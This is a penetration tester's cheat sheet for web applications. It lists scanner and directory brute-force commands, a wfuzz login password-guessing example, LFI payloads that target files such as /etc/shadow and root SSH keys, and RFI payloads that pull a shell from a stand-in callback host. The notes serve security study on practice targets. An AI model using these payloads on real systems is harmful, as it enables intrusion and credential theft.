HTTP General Notes

HTTP General Notes

Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

Manual Connect

Using openssl to connect to a webserver (HTTPS):

openssl s_client -connect hack.me:443 [-debug] [-state] [-quiet]

• Debug flag optional.
• State is optional - prints the state of the handshake.
• Quiet is optional.

Using Httprint to identify web servers: httprint -P0 -h <target hosts> -s <signature file>

• -P0 to avoid pinging the host first
• -h the list of hosts (IP addresses/IP range)
• -s signature file to use

Web App Scanners

Nikto:

• nikto --url <domain>

Wpscan:

• wpscan --url <domain>
• wpscan --url <domain> --enumerate ap at (All Plugins, All Themes)
• wpscan --url <domain> --enumerate u (Usernames)
• wpscan --url <domain> --enumerate v

Web Tools for Directory Scanning:

Dirb:

• dirb <domain>
• dirb <domain> <wordlist>

Gobuster:

• gobuster -u <url> -w /usr/share/wordlists/<Wordlist file>
• gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -a Firefox (Custom Agent)
• gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html
• gobuster -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
• gobuster -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
• gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200"
• gobuster -v -e -u <url> -w /usr/share/wordlists/<Wordlist file> -x .php,.txt,.html -s "200" -o output.txt
• gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Wfuzz:

• wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
• wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
• wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
• wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

Dirsearch:

• dirsearch /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

Other Tools:

• Burp Suite
• OWASP Zap
• Cadaver
• SQLMap
• Joomscan

Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa

Windows:

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM

Testing for RFI:

http://example.com/index.php?page=http://callback.com/shell.txt http://example.com/index.php?page=http://callback.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

Resources

• Turning LFI to RFI: https://l.avala.mp/?p=241